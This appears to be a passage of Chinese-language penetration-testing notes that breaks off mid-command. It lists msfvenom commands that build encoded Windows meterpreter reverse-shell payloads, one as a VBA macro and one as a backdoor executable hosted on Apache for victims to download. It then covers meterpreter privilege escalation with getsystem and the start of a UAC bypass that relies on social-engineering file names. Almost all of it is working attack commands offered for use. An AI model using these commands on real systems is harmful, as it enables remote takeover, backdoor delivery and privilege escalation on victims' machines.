##宏代码生成
root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe
##利用session 扩大战果
###生成后门shell文件
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=172.16.66.12 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe
root@kali:~# cp a.exe /var/www/html/a.exe ##拷贝到apache目录,方便靶机下载
root@kali:~# service apache2 start
###获取shell后提权
meterpreter > load priv ##读入提权模块
meterpreter > getsystem ##获取system最高权限
####提权失败时需要绕过UAC机制(administrators组账号)
方法一 ##询问UAC权限(会向用户弹出UAC确认框),需要社工文件名欺骗
msf > use exploit/windows/local/ask
msf exploit(